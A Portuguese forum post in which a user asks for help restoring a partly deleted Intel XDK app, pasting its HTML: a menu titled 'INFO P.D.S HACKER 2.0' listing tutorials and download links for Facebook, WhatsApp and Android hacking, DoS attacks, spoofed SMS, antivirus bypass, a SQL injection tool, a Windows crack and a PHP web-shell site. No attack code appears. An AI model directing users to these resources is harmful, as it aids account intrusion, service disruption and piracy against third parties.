- Mark as New
- Bookmark
- Subscribe
- Mute
- Subscribe to RSS Feed
- Permalink
- Report Inappropriate Content
Eu mexi nos codigo do meu aplicativo e ocorreu que acabei apagando sem querer e fechei o programa e o intel xdk nao tem botão para salvar o nao ele salva sozin '-' ... alguem me ajuda por favor dps que eu apaguei uma parte do codigo sem querer o app fico igual ta ai na foto :
SUMIU AS "PAGE" MAS SE VC OLHAR O CODIGO ESTA TUDO COM AS PAGINA TA TUDO COM OS TOPICO TUDO CERTIN SO QUE DPS QUE APAGO FICO DESSE JEITO PARA QUEM SABE PROGRAMAÇÃO QUE COMANDOS QUE EU TENHO QUE ADICIONAR A MAS NO CODIGO PARA FUNCIONAR DENOVO E EU TER MEU APLICATIVO ALI COM MINHAS PAGINA DE VOLTA ? EU SO APAGUEI SEM QRER OS PRIMEIROS COMANDOS OB...
<!DOCTYPE html>
<html>
<!--
* Please see the included README.md file for license terms and conditions.
-->
<head>
<link rel="stylesheet" type="text/css" href="bootstrap/css/bootstrap.min.css">
<meta charset="UTF-8">
<title>Blank App Designer Packaged Web App Project Template</title>
<meta http-equiv="Content-type" content="text/html; charset=utf-8">
<div class="upage hidden back" id="ENTROUNOAPP">
<div class="upage-outer">
<div class="uib-header header-bg container-group inner-element uib_w_3 uib-header-fixed" data-uib="layout/header" data-ver="0">
<h2>INFO P.D.S HACKER 2.0</h2>
<div class="widget-container wrapping-col single-centered"></div>
<div class="widget-container content-area horiz-area wrapping-col left">
<button class="btn widget uib_w_22 d-margins btn-info" data-uib="twitter%20bootstrap/button" data-ver="1" id="REVERSA"><i class="glyphicon glyphicon-chevron-left button-icon-left" data-position="left"></i>
</button>
</div>
<div class="widget-container content-area horiz-area wrapping-col right"></div>
</div>
<div class="upage-content ac0 content-area vertical-col left" id="page_39_84">
<div class="widget uib_w_4" data-uib="media/img" data-ver="0">
<figure class="figure-align">
<img src="http://1.bp.blogspot.com/-cqO_vODJPsU/Voiac8VHI7I/AAAAAAAAAVM/oXEdXhA29HU/s1600/944368_1713404195558381_5192047378043940051_n.jpg">
<figcaption data-position="bottom"></figcaption>
</figure>
</div>
<div class="progress full-width-widget widget uib_w_515 d-margins" data-uib="twitter%20bootstrap/progress_bar" data-ver="1">
<div class="progress-bar progress-bar-info" style="width: 100%;"></div>
</div>
<div class="list-group widget uib_w_11 d-margins" data-uib="twitter%20bootstrap/list_group" data-ver="1"><a class="list-group-item allow-badge widget uib_w_12" data-uib="twitter%20bootstrap/list_item" data-ver="1" href="https://www.youtube.com/channel/UCu1hBwurjfNBpV8qPUQqZvA/videos"><span class="badge glyphicon glyphicon-film"> </span>
<h4 class="list-group-item-heading">VÍDEO-AULAS</h4>
</a>
</div>
<div class="progress full-width-widget widget uib_w_13 d-margins" data-uib="twitter%20bootstrap/progress_bar" data-ver="1">
<div class="progress-bar progress-bar-success progress-bar-info" style="width: 100%;"></div>
</div>
<div class="tab-content widget uib_w_10 d-margins" data-uib="twitter%20bootstrap/tabs" data-ver="1">
<div role="tabpanel" id="second-tab" class="col uib_col_2 tab-pane active" data-uib="layout/col" data-ver="0">
<div class="widget-container content-area vertical-col">
<button class="btn widget uib_w_32 d-margins btn-lg btn-primary" data-uib="twitter%20bootstrap/button" data-ver="1">ANALISE DE VULNERABILIDADE</button>
<div class="list-group widget uib_w_74 d-margins" data-uib="twitter%20bootstrap/list_group" data-ver="1">
<a class="list-group-item allow-badge widget uib_w_76" data-uib="twitter%20bootstrap/list_item" data-ver="1">
<h4 class="list-group-item-heading">1- XVWA – Xtreme Vulnerable</h4>
</a>
<a class="list-group-item allow-badge widget uib_w_77" data-uib="twitter%20bootstrap/list_item" data-ver="1" id="2-INISCAN – Análise de Segurança">
<h4 class="list-group-item-heading">3- INISCAN – Análise de Segurança</h4>
</a>
<a class="list-group-item allow-badge widget uib_w_31" data-uib="twitter%20bootstrap/list_item" data-ver="1" id="dicasfb">
<h4 class="list-group-item-heading">2-Dicas de como hackear um FACEBOOK</h4>
</a>
</div>
<div class="list-group widget uib_w_98 d-margins" data-uib="twitter%20bootstrap/list_group" data-ver="1">
<a class="list-group-item allow-badge widget uib_w_99" data-uib="twitter%20bootstrap/list_item" data-ver="1" id="Lynis – Ferramenta de Auditoria ">
<h4 class="list-group-item-heading">4- Lynis – Ferramenta de Auditoria </h4>
</a>
<a class="list-group-item allow-badge widget uib_w_100" data-uib="twitter%20bootstrap/list_item" data-ver="1" id="WATOBO – Ferramenta de PenTest">
<h4 class="list-group-item-heading">5- WATOBO – Ferramenta de PenTest</h4>
</a>
<a class="list-group-item allow-badge widget uib_w_128 d-margins" data-uib="twitter%20bootstrap/list_item" data-ver="1">
<h4 class="list-group-item-heading">6- XSSCRAPY – Varredura Completa de XSS</h4>
</a>
<a class="list-group-item allow-badge widget uib_w_137 d-margins" data-uib="twitter%20bootstrap/list_item" data-ver="1">
<h4 class="list-group-item-heading">7- SAWEF – Crawler de E-mails e Links</h4>
</a>
<a class="list-group-item allow-badge widget uib_w_151 d-margins" data-uib="twitter%20bootstrap/list_item" data-ver="1">
<h4 class="list-group-item-heading">8- GRAUDIT – Análise de Vulnerabilidades no Código Fonte</h4>
</a>
<a class="list-group-item allow-badge widget uib_w_164 d-margins" data-uib="twitter%20bootstrap/list_item" data-ver="1">
<h4 class="list-group-item-heading">9- Security Onion – IDS, NMS e Gerenciamento de Log</h4>
</a>
<a class="list-group-item allow-badge widget uib_w_175 d-margins" data-uib="twitter%20bootstrap/list_item" data-ver="1">
<h4 class="list-group-item-heading">10- Sandcat Browser – Um navegador para Pen-Testers</h4>
</a>
</div>
<div class="btn-group uib-bs-flex widget uib_w_69 d-margins" data-uib="twitter%20bootstrap/button_group" data-ver="1">
<button class="btn widget uib_w_72 btn-lg btn-info" data-uib="twitter%20bootstrap/button" data-ver="1">LINUX</button>
</div>
<div class="list-group widget uib_w_182 d-margins" data-uib="twitter%20bootstrap/list_group" data-ver="1">
<a class="list-group-item allow-badge widget uib_w_183" data-uib="twitter%20bootstrap/list_item" data-ver="1">
<h4 class="list-group-item-heading">11- VHostCreator :: Criação automática de Virtual Hosts com Shellscript</h4>
</a>
<a class="list-group-item allow-badge widget uib_w_184" data-uib="twitter%20bootstrap/list_item" data-ver="1">
<h4 class="list-group-item-heading">12- Instalando o Thunderbird, Firefox e outros utilitários da Mozilla no Debian 8 e Kali 2.0</h4>
</a>
<a class="list-group-item allow-badge widget uib_w_185" data-uib="twitter%20bootstrap/list_item" data-ver="1">
<h4 class="list-group-item-heading">13- Criando e Gerenciando Partições de Disco com FDISK</h4>
</a>
<a class="list-group-item allow-badge widget uib_w_198 d-margins" data-uib="twitter%20bootstrap/list_item" data-ver="1">
<h4 class="list-group-item-heading">14- Guia de Gerenciamento de Usuários no Linux</h4>
</a>
<a class="list-group-item allow-badge widget uib_w_202 d-margins" data-uib="twitter%20bootstrap/list_item" data-ver="1">
<h4 class="list-group-item-heading">15- Criando rotinas de Backup</h4>
</a>
</div>
<div class="list-group widget uib_w_208 d-margins" data-uib="twitter%20bootstrap/list_group" data-ver="1">
<a class="list-group-item allow-badge widget uib_w_209" data-uib="twitter%20bootstrap/list_item" data-ver="1">
<h4 class="list-group-item-heading">16- Gerando suas Wordlists com Crunch</h4>
</a>
</div>
<div class="btn-group uib-bs-flex widget uib_w_213 d-margins" data-uib="twitter%20bootstrap/button_group" data-ver="1">
<button class="btn widget uib_w_214 btn-lg btn-info" data-uib="twitter%20bootstrap/button" data-ver="1">SEGURANÇA DA INFORMAÇÃO</button>
</div>
<div class="list-group widget uib_w_215 d-margins" data-uib="twitter%20bootstrap/list_group" data-ver="1">
<a class="list-group-item allow-badge widget uib_w_216" data-uib="twitter%20bootstrap/list_item" data-ver="1">
<h4 class="list-group-item-heading">17- Protegendo diretórios do Apache com senha</h4>
</a>
<a class="list-group-item allow-badge widget uib_w_217" data-uib="twitter%20bootstrap/list_item" data-ver="1">
<h4 class="list-group-item-heading">18- Crackeando Hashes </h4>
</a>
<a class="list-group-item allow-badge widget uib_w_218" data-uib="twitter%20bootstrap/list_item" data-ver="1">
<h4 class="list-group-item-heading">19- Criptografando o diretório Home do usuário no Linux</h4>
</a>
<a class="list-group-item allow-badge widget uib_w_230 d-margins" data-uib="twitter%20bootstrap/list_item" data-ver="1" id="20">
<h4 class="list-group-item-heading">20- Footprint – Levantando informações do alvo</h4>
</a>
</div>
<div class="list-group widget uib_w_236 d-margins" data-uib="twitter%20bootstrap/list_group" data-ver="1">
<a class="list-group-item allow-badge widget uib_w_237" data-uib="twitter%20bootstrap/list_item" data-ver="1">
<h4 class="list-group-item-heading">21- Explorando e tratando a falha de Cross-site-scripting (XSS)</h4>
</a>
<a class="list-group-item allow-badge widget uib_w_239" data-uib="twitter%20bootstrap/list_item" data-ver="1">
<h4 class="list-group-item-heading">22- Práticas sobre Engenharia Social</h4>
</a>
<a class="list-group-item allow-badge widget uib_w_250 d-margins" data-uib="twitter%20bootstrap/list_item" data-ver="1">
<h4 class="list-group-item-heading">23- Precavendo Contra Roubo de Celular</h4>
</a>
<a class="list-group-item allow-badge widget uib_w_258 d-margins" data-uib="twitter%20bootstrap/list_item" data-ver="1">
<h4 class="list-group-item-heading">24- O que é Ethical Hacking? </h4>
</a>
<a class="list-group-item allow-badge widget uib_w_266 d-margins" data-uib="twitter%20bootstrap/list_item" data-ver="1">
<h4 class="list-group-item-heading">25- Como “dibrar” a espionagem da Microsoft.</h4>
</a>
</div>
<div class="btn-group uib-bs-flex widget uib_w_278 d-margins" data-uib="twitter%20bootstrap/button_group" data-ver="1">
<button class="btn widget uib_w_279 btn-lg btn-info" data-uib="twitter%20bootstrap/button" data-ver="1">DOS/DDOS</button>
</div>
<div class="list-group widget uib_w_280 d-margins" data-uib="twitter%20bootstrap/list_group" data-ver="1">
<a class="list-group-item allow-badge widget uib_w_274 d-margins" data-uib="twitter%20bootstrap/list_item" data-ver="1">
<h4 class="list-group-item-heading">26- Diferenças entre ataque DoS e DDoS</h4>
</a>
<a class="list-group-item allow-badge widget uib_w_282" data-uib="twitter%20bootstrap/list_item" data-ver="1">
<h4 class="list-group-item-heading">27- Ataques em redes com T50</h4>
</a>
<a class="list-group-item allow-badge widget uib_w_299 d-margins" data-uib="twitter%20bootstrap/list_item" data-ver="1">
<h4 class="list-group-item-heading">28- Derrubando servidores com Slowloris</h4>
</a>
</div>
<div class="btn-group uib-bs-flex widget uib_w_322 d-margins" data-uib="twitter%20bootstrap/button_group" data-ver="1">
<button class="btn widget uib_w_323 btn-lg btn-info" data-uib="twitter%20bootstrap/button" data-ver="1">ANDROID</button>
</div>
<div class="list-group widget uib_w_324 d-margins" data-uib="twitter%20bootstrap/list_group" data-ver="1">
<a class="list-group-item allow-badge widget uib_w_325" data-uib="twitter%20bootstrap/list_item" data-ver="1">
<h4 class="list-group-item-heading">29- Como Hack Database WhatsApp (remotamente)</h4>
</a>
</div>
<div class="btn-group uib-bs-flex widget uib_w_300 d-margins" data-uib="twitter%20bootstrap/button_group" data-ver="1">
<button class="btn widget uib_w_301 btn-lg btn-info" data-uib="twitter%20bootstrap/button" data-ver="1">PENTEST</button>
</div>
<div class="list-group widget uib_w_302 d-margins" data-uib="twitter%20bootstrap/list_group" data-ver="1">
<a class="list-group-item allow-badge widget uib_w_303" data-uib="twitter%20bootstrap/list_item" data-ver="1">
<h4 class="list-group-item-heading">30- ataque Man in the Middle</h4>
</a>
<a class="list-group-item allow-badge widget uib_w_304" data-uib="twitter%20bootstrap/list_item" data-ver="1">
<h4 class="list-group-item-heading">31- Vulnerabilidades com Nikto</h4>
</a>
<a class="list-group-item allow-badge widget uib_w_305" data-uib="twitter%20bootstrap/list_item" data-ver="1">
<h4 class="list-group-item-heading">32- Como Hack Android Usando Kali (remotamente)</h4>
</a>
</div>
<div class="btn-group uib-bs-flex widget uib_w_340 d-margins" data-uib="twitter%20bootstrap/button_group" data-ver="1">
<button class="btn widget uib_w_342 btn-lg btn-info" data-uib="twitter%20bootstrap/button" data-ver="1">Os Hacks de Mr. Robot</button>
</div>
<div class="list-group widget uib_w_343 d-margins" data-uib="twitter%20bootstrap/list_group" data-ver="1">
<a class="list-group-item allow-badge widget uib_w_344" data-uib="twitter%20bootstrap/list_item" data-ver="1">
<h4 class="list-group-item-heading">33- Como enviar e-mails Ultra-Secure</h4>
</a>
<a class="list-group-item allow-badge widget uib_w_345" data-uib="twitter%20bootstrap/list_item" data-ver="1">
<h4 class="list-group-item-heading">34- Como Elliot & Fsociety destruíram dados de Evil Corp</h4>
</a>
<a class="list-group-item allow-badge widget uib_w_346" data-uib="twitter%20bootstrap/list_item" data-ver="1">
<h4 class="list-group-item-heading">35- Como Elliot & Fsociety fizeram o seu hack a Evil Corp </h4>
</a>
<a class="list-group-item allow-badge widget uib_w_384 d-margins" data-uib="twitter%20bootstrap/list_item" data-ver="1">
<h4 class="list-group-item-heading">36- Como ocultar dados em arquivos de áudio</h4>
</a>
<a class="list-group-item allow-badge widget uib_w_385 d-margins" data-uib="twitter%20bootstrap/list_item" data-ver="1">
<h4 class="list-group-item-heading">37- Como Hack Bluetooth</h4>
</a>
<a class="list-group-item allow-badge widget uib_w_417 d-margins" data-uib="twitter%20bootstrap/list_item" data-ver="1" id="MENSAGEMSMS">
<h4 class="list-group-item-heading">38- Enviar mensagem de texto SMS Spoofed</h4>
<p class="list-group-item-text">mensagem de texto urgente falsificado</p>
</a>
</div>
<div class="btn-group uib-bs-flex widget uib_w_418 d-margins" data-uib="twitter%20bootstrap/button_group" data-ver="1">
<button class="btn widget uib_w_419 btn-lg btn-info" data-uib="twitter%20bootstrap/button" data-ver="1">Apostila, Livros, P/ Download</button>
</div>
<div class="alert no_wrap widget uib_w_432 d-margins alert-success" data-uib="twitter%20bootstrap/alert" data-ver="1">Na maioria dos casos, é necessario criar uma conta no site para ter permição para fazer download dos pacotes .</div>
<div class="list-group widget uib_w_420 d-margins" data-uib="twitter%20bootstrap/list_group" data-ver="1">
<a class="list-group-item allow-badge widget uib_w_421" data-uib="twitter%20bootstrap/list_item" data-ver="1" href="https://www.faagle.com/file?file=Pacote+Hacker+%28Apostilas%2C+Tutoriais%2C+Videos%2C+Sites...%29_20140121024744">
<h4 class="list-group-item-heading">39- Pacote Hacker 01</h4>
<p class="list-group-item-text">Apostila, Livros, Video-Aulas</p>
</a>
<a class="list-group-item allow-badge widget uib_w_422" data-uib="twitter%20bootstrap/list_item" data-ver="1" href="https://www.faagle.com/file?file=Pacote+Hacker+2.0+%28Apostilas%2C+Videos%2C+Sites...%29_20150227182018">
<h4 class="list-group-item-heading">40- Pacote Hacker 02</h4>
<p class="list-group-item-text">backtrack botnets ddos firewall metasploit pentest sqli xss</p>
</a>
<a class="list-group-item allow-badge widget uib_w_423" data-uib="twitter%20bootstrap/list_item" data-ver="1" href="https://www.faagle.com/file?file=Livro+Proibido+do+Curso+de+Hacker+Completo+285+p%C3%A1ginas+71_20141203133048">
<h4 class="list-group-item-heading">41- Livro Proibido do Curso de Hacker Completo 285 páginas 71</h4>
</a>
</div>
<div class="list-group widget uib_w_424 d-margins" data-uib="twitter%20bootstrap/list_group" data-ver="1">
<a class="list-group-item allow-badge widget uib_w_425" data-uib="twitter%20bootstrap/list_item" data-ver="1" href="https://www.faagle.com/file?file=Livro+Hacker+Inside+%5B+HS+%5D_20131123234938">
<h4 class="list-group-item-heading">42- Livro Hacker Inside [ HS ]</h4>
</a>
<a class="list-group-item allow-badge widget uib_w_426" data-uib="twitter%20bootstrap/list_item" data-ver="1" href="https://www.faagle.com/file?file=Invasores+-+Nenhum+Sistema+Est%C3%A1+%C3%A0+Salvo+%5B+DUBLADO+HD+%5D_20150730202926">
<h4 class="list-group-item-heading">43- Invasores - Nenhum Sistema Está à Salvo [ DUBLADO HD ]</h4>
<p class="list-group-item-text">é necessario efetuar login para assisti-ló</p>
</a>
<a class="list-group-item allow-badge widget uib_w_427" data-uib="twitter%20bootstrap/list_item" data-ver="1" href="https://www.faagle.com/file?file=Segredos+do+Hacker+%C3%89tico+v2+%282008%29.pdf_20131223021918">
<h4 class="list-group-item-heading">44- Segredos do Hacker Ético v2 </h4>
</a>
</div>
<div class="list-group widget uib_w_428 d-margins" data-uib="twitter%20bootstrap/list_group" data-ver="1">
<a class="list-group-item allow-badge widget uib_w_429" data-uib="twitter%20bootstrap/list_item" data-ver="1" href="https://www.faagle.com/file?file=Cole%C3%A7ao+Hacker+Inside%2BPack+Hacker_20150305012510">
<h4 class="list-group-item-heading">45- Coleçao Hacker Inside+Pack Hacker</h4>
</a>
<a class="list-group-item allow-badge widget uib_w_430" data-uib="twitter%20bootstrap/list_item" data-ver="1" href="https://www.faagle.com/file?file=Hacking+Android+com+Kali+Linux+2.0_20151111162726">
<h4 class="list-group-item-heading">46- Hacking Android com Kali Linux 2.0</h4>
</a>
<a class="list-group-item allow-badge widget uib_w_431" data-uib="twitter%20bootstrap/list_item" data-ver="1" href="https://www.faagle.com/file?file=Hacking+WIFI+WPA-WPA2_20151113170946">
<h4 class="list-group-item-heading">47- Hacking WIFI WPA-WPA2</h4>
</a>
</div>
<div class="list-group widget uib_w_433 d-margins" data-uib="twitter%20bootstrap/list_group" data-ver="1">
<a class="list-group-item allow-badge widget uib_w_434" data-uib="twitter%20bootstrap/list_item" data-ver="1" href="https://www.faagle.com/file?file=Document%C3%A1rio+-+A+Origem+dos+Hackers+%5B+DUBLADO+%5D_20150823152345">
<h4 class="list-group-item-heading">48- Documentário - A Origem dos Hackers [ DUBLADO ]</h4>
</a>
<a class="list-group-item allow-badge widget uib_w_435" data-uib="twitter%20bootstrap/list_item" data-ver="1">
<h4 class="list-group-item-heading">49- A Arte de Enganar - Kevin Mitnick (Engenharia Social)</h4>
</a>
<a class="list-group-item allow-badge widget uib_w_436" data-uib="twitter%20bootstrap/list_item" data-ver="1" href="https://www.faagle.com/file?file=Google+Hacking+-+Footprinting_20151020142221">
<h4 class="list-group-item-heading">50- Google Hacking - Footprinting</h4>
</a>
</div>
<div class="list-group widget uib_w_437 d-margins" data-uib="twitter%20bootstrap/list_group" data-ver="1">
<a class="list-group-item allow-badge widget uib_w_438" data-uib="twitter%20bootstrap/list_item" data-ver="1" href="https://www.faagle.com/file?file=O+Guia+do+Hacker+Brasileiro_20150520233805">
<h4 class="list-group-item-heading">51-O Guia do Hacker Brasileiro </h4>
</a>
<a class="list-group-item allow-badge widget uib_w_439" data-uib="twitter%20bootstrap/list_item" data-ver="1" href="https://www.faagle.com/file?file=Livro+Proibido+do+Curso+de+Hacker+Completo_20151116045733">
<h4 class="list-group-item-heading">52- Livro Proibido do Curso de Hacker Completo</h4>
</a>
<a class="list-group-item allow-badge widget uib_w_440" data-uib="twitter%20bootstrap/list_item" data-ver="1" href="https://www.faagle.com/file?file=Brute-force+WPA+PSK+Using+Pyrit+in+Backtrack+5_20151023165336">
<h4 class="list-group-item-heading">55- Brute-force WPA</h4>
</a>
</div>
<div class="list-group widget uib_w_441 d-margins" data-uib="twitter%20bootstrap/list_group" data-ver="1">
<a class="list-group-item allow-badge widget uib_w_442" data-uib="twitter%20bootstrap/list_item" data-ver="1" href="https://www.faagle.com/file?file=Processo+Hacker_20140902203715">
<h4 class="list-group-item-heading">56- Processo Hacker Opções </h4>
</a>
<a class="list-group-item allow-badge widget uib_w_443" data-uib="twitter%20bootstrap/list_item" data-ver="1" href="https://www.faagle.com/file?file=Ataque+de+SQL+INJECTION+com+Kali+Linux_20151111162840">
<h4 class="list-group-item-heading">57- Ataque de SQL INJECTION com Kali Linux </h4>
</a>
<a class="list-group-item allow-badge widget uib_w_444" data-uib="twitter%20bootstrap/list_item" data-ver="1" href="https://www.faagle.com/file?file=Spyware+Terminator+2015_20150203211052">
<h4 class="list-group-item-heading">58- Spyware Terminator 2015 </h4>
</a>
</div>
<div class="list-group widget uib_w_445 d-margins" data-uib="twitter%20bootstrap/list_group" data-ver="1">
<a class="list-group-item allow-badge widget uib_w_446" data-uib="twitter%20bootstrap/list_item" data-ver="1" href="https://www.faagle.com/file?file=A+Arte+de+Invadir_20151128232207">
<h4 class="list-group-item-heading">59- A Arte de Invadir </h4>
</a>
<a class="list-group-item allow-badge widget uib_w_447" data-uib="twitter%20bootstrap/list_item" data-ver="1" href="https://www.faagle.com/file?file=015+-+Derrubando+o+gateway+da+faculdade+com+o+smurf_20150829211546">
<h4 class="list-group-item-heading">60- Derrubando o gateway da faculdade com o smurf</h4>
</a>
<a class="list-group-item allow-badge widget uib_w_448" data-uib="twitter%20bootstrap/list_item" data-ver="1" href="https://www.faagle.com/file?file=07+-+Entendendo+Redes+Wan_20150828114717">
<h4 class="list-group-item-heading">61-Entendendo Redes Wan </h4>
</a>
</div>
<div class="list-group widget uib_w_449 d-margins" data-uib="twitter%20bootstrap/list_group" data-ver="1">
<a class="list-group-item allow-badge widget uib_w_450" data-uib="twitter%20bootstrap/list_item" data-ver="1" href="https://www.faagle.com/file?file=Como+capturar+e+derrubar+IP+de+qualquer+pessoa+-+pt-BR+2015+TUTO_20160102142940">
<h4 class="list-group-item-heading">62- Como capturar e derrubar IP de qualquer pessoa</h4>
</a>
<a class="list-group-item allow-badge widget uib_w_451" data-uib="twitter%20bootstrap/list_item" data-ver="1" href="https://www.faagle.com/file?file=005+-++Instalando+as+ferramentas+necess%C3%A1rias+ao+ataque+DoS_20150829210041">
<h4 class="list-group-item-heading">63- Instalando as ferramentas necessárias ao ataque DoS</h4>
</a>
<a class="list-group-item allow-badge widget uib_w_452" data-uib="twitter%20bootstrap/list_item" data-ver="1" href="https://www.faagle.com/file?file=Curso+de+DDoS_20150226120433">
<h4 class="list-group-item-heading">64- Curso de DDoS </h4>
</a>
</div>
<div class="list-group widget uib_w_453 d-margins" data-uib="twitter%20bootstrap/list_group" data-ver="1">
<a class="list-group-item allow-badge widget uib_w_454" data-uib="twitter%20bootstrap/list_item" data-ver="1" href="https://www.faagle.com/file?file=MITM+-+Man-in-the-middle+Attack+_20150913233335">
<h4 class="list-group-item-heading">65- MITM - Man-in-the-middle Attack</h4>
</a>
<a class="list-group-item allow-badge widget uib_w_455" data-uib="twitter%20bootstrap/list_item" data-ver="1" href="https://www.faagle.com/file?file=Enviar+sms+para+pessoas+que+est%C3%A3o+em+sua+rede_20151201001452">
<h4 class="list-group-item-heading">66- Enviar sms para pessoas que estão em sua rede</h4>
</a>
<a class="list-group-item allow-badge widget uib_w_456" data-uib="twitter%20bootstrap/list_item" data-ver="1" href="https://www.faagle.com/file?file=Hacking+Facebook+via+WIFI_20151112174939">
<h4 class="list-group-item-heading">67- Hacking Facebook via WIFI</h4>
</a>
</div>
<div class="list-group widget uib_w_457 d-margins" data-uib="twitter%20bootstrap/list_group" data-ver="1">
<a class="list-group-item allow-badge widget uib_w_458" data-uib="twitter%20bootstrap/list_item" data-ver="1" href="https://www.faagle.com/file?file=Recuperar+arquivos+apagados+com+Kali+Linux_20151112175749">
<h4 class="list-group-item-heading">68- Recuperar arquivos apagados com Kali Linux</h4>
</a>
<a class="list-group-item allow-badge widget uib_w_459" data-uib="twitter%20bootstrap/list_item" data-ver="1" href="https://www.faagle.com/file?file=BypassAV_20151208225529">
<h4 class="list-group-item-heading">69- BypassAV</h4>
</a>
<a class="list-group-item allow-badge widget uib_w_460" data-uib="twitter%20bootstrap/list_item" data-ver="1" href="https://www.faagle.com/file?file=Seguran%C3%A7a-da-informa%C3%A7%C3%A3o-no-Brasil-OFICIAL_20150602014547">
<h4 class="list-group-item-heading">70- Segurança da informação no Brasil</h4>
</a>
</div>
<div class="btn-group uib-bs-flex widget uib_w_463 d-margins" data-uib="twitter%20bootstrap/button_group" data-ver="1">
<button class="btn widget uib_w_464 btn-lg btn-info" data-uib="twitter%20bootstrap/button" data-ver="1">Programas</button>
</div>
<div class="alert no_wrap widget uib_w_465 d-margins alert-success" data-uib="twitter%20bootstrap/alert" data-ver="1">Recomendo você, pegar o link que você será redirecionado, e pesquisar no navegador do seu computador, para a instalação dos programas !!!</div>
<div class="list-group widget uib_w_466 d-margins" data-uib="twitter%20bootstrap/list_group" data-ver="1">
<a class="list-group-item allow-badge widget uib_w_467" data-uib="twitter%20bootstrap/list_item" data-ver="1" href="https://www.faagle.com/file?file=Havij+1.16+-+Advanced+SQL+Injection_20141215142431">
<h4 class="list-group-item-heading">71- Havij 1.16 - Advanced SQL Injection </h4>
</a>
<a class="list-group-item allow-badge widget uib_w_468" data-uib="twitter%20bootstrap/list_item" data-ver="1" href="https://www.faagle.com/file?file=RemoveWAT_20141207191622">
<h4 class="list-group-item-heading">72- RemoveWAT</h4>
<p class="list-group-item-text">Ativador Windows 7 windows 7 ativador windows 7 crack</p>
</a>
<a class="list-group-item allow-badge widget uib_w_469" data-uib="twitter%20bootstrap/list_item" data-ver="1" href="https://www.faagle.com/file?file=Intercepter-NG.v098+%5B+HS+%5D_20140114221345">
<h4 class="list-group-item-heading">73- Intercepter-NG.v098</h4>
</a>
</div>
<div class="list-group widget uib_w_470 d-margins" data-uib="twitter%20bootstrap/list_group" data-ver="1">
<a class="list-group-item allow-badge widget uib_w_471" data-uib="twitter%20bootstrap/list_item" data-ver="1" href="http://www.c99shellphp.com/">
<h4 class="list-group-item-heading">74- Shell's</h4>
</a>
</div>
<div class="btn-group uib-bs-flex widget uib_w_498 d-margins" data-uib="twitter%20bootstrap/button_group" data-ver="1">
<button class="btn widget uib_w_499 btn-lg btn-info" data-uib="twitter%20bootstrap/button" data-ver="1">Aprenda a PROGRAMAR EM:</button>
</div>
<div class="alert no_wrap widget uib_w_500 d-margins alert-success" data-uib="twitter%20bootstrap/alert" data-ver="1">Lembrando, Vocês...para começar a fazer o curso é necessário que, você se cadastra no site ou faça sua matricula, lembrando que os cursos são gratis, leia a descrição de cada curso e bons estudos !! ;)</div>
<div class="list-group widget uib_w_474 d-margins" data-uib="twitter%20bootstrap/list_group" data-ver="1">
<a class="list-group-item allow-badge widget uib_w_475" data-uib="twitter%20bootstrap/list_item" data-ver="1" href="https://www.iped.com.br/programacao-e-desenvolvimento/curso/delphi#planos">
<h4 class="list-group-item-heading">75- Curso Online de Delphi</h4>
</a>
<a class="list-group-item allow-badge widget uib_w_476" data-uib="twitter%20bootstrap/list_item" data-ver="1" href="http://www.cursou.com.br/informatica/introducao-banco-de-dados-sql/">
<h4 class="list-group-item-heading">76- Curso de Introdução ao uso de Banco de Dados e SQL Fonte</h4>
</a>
<a class="list-group-item allow-badge widget uib_w_477" data-uib="twitter%20bootstrap/list_item" data-ver="1" href="http://www.cursou.com.br/informatica/logica-programacao/">
<h4 class="list-group-item-heading">77- Introdução à Lógica de Programação</h4>
</a>
</div>
<div class="list-group widget uib_w_478 d-margins" data-uib="twitter%20bootstrap/list_group" data-ver="1">
<a class="list-group-item allow-badge widget uib_w_479" data-uib="twitter%20bootstrap/list_item" data-ver="1" href="https://www.codecademy.com/pt/learn/javascript">
<h4 class="list-group-item-heading">78- JavaScript</h4>
</a>
<a class="list-group-item allow-badge widget uib_w_480" data-uib="twitter%20bootstrap/list_item" data-ver="1" href="https://www.codecademy.com/pt/learn/web">
<h4 class="list-group-item-heading">79- HTML & CSS</h4>
</a>
<a class="list-group-item allow-badge widget uib_w_481" data-uib="twitter%20bootstrap/list_item" data-ver="1">
<h4 class="list-group-item-heading">80- jQuery</h4>
</a>
</div>
<div class="list-group widget uib_w_482 d-margins" data-uib="twitter%20bootstrap/list_group" data-ver="1">
<a class="list-group-item allow-badge widget uib_w_483" data-uib="twitter%20bootstrap/list_item" data-ver="1" href="https://www.codecademy.com/pt/learn/ruby">
<h4 class="list-group-item-heading">81- Ruby</h4>
</a>
<a class="list-group-item allow-badge widget uib_w_484" data-uib="twitter%20bootstrap/list_item" data-ver="1" href="https://www.codecademy.com/pt/learn/python">
<h4 class="list-group-item-heading">82- Python</h4>
</a>
<a class="list-group-item allow-badge widget uib_w_485" data-uib="twitter%20bootstrap/list_item" data-ver="1" href="https://www.codecademy.com/pt/learn/php">
<h4 class="list-group-item-heading">83- PHP</h4>
</a>
</div>
<div class="list-group widget uib_w_486 d-margins" data-uib="twitter%20bootstrap/list_group" data-ver="1">
<a class="list-group-item allow-badge widget uib_w_487" data-uib="twitter%20bootstrap/list_item" data-ver="1" href="http://www.cursou.com.br/informatica/programacao-linguagem-c/">
<h4 class="list-group-item-heading">84- Curso de Programação em Linguagem C</h4>
</a>
<a class="list-group-item allow-badge widget uib_w_488" data-uib="twitter%20bootstrap/list_item" data-ver="1" href="http://www.cursou.com.br/informatica/android/">
<h4 class="list-group-item-heading">85- Programação para Android</h4>
</a>
<a class="list-group-item allow-badge widget uib_w_489" data-uib="twitter%20bootstrap/list_item" data-ver="1" href="http://www.cursou.com.br/informatica/programacao-games/">
<h4 class="list-group-item-heading">86- Programação de Games</h4>
</a>
</div>
<div class="list-group widget uib_w_490 d-margins" data-uib="twitter%20bootstrap/list_group" data-ver="1">
<a class="list-group-item allow-badge widget uib_w_491" data-uib="twitter%20bootstrap/list_item" data-ver="1" href="http://www.cursou.com.br/informatica/asp-net-mvc/">
<h4 class="list-group-item-heading">87- Conceitos Básicos de ASP.NET MVC</h4>
</a>
<a class="list-group-item allow-badge widget uib_w_492" data-uib="twitter%20bootstrap/list_item" data-ver="1" href="http://www.cursou.com.br/informatica/c-e-nhibernate-basico/">
<h4 class="list-group-item-heading">88- C# e NHibernate – Curso Básico</h4>
</a>
<a class="list-group-item allow-badge widget uib_w_493" data-uib="twitter%20bootstrap/list_item" data-ver="1" href="http://www.cursou.com.br/informatica/c-sharp/">
<h4 class="list-group-item-heading">89- Curso de C Sharp</h4>
</a>
</div>
<div class="list-group widget uib_w_494 d-margins" data-uib="twitter%20bootstrap/list_group" data-ver="1">
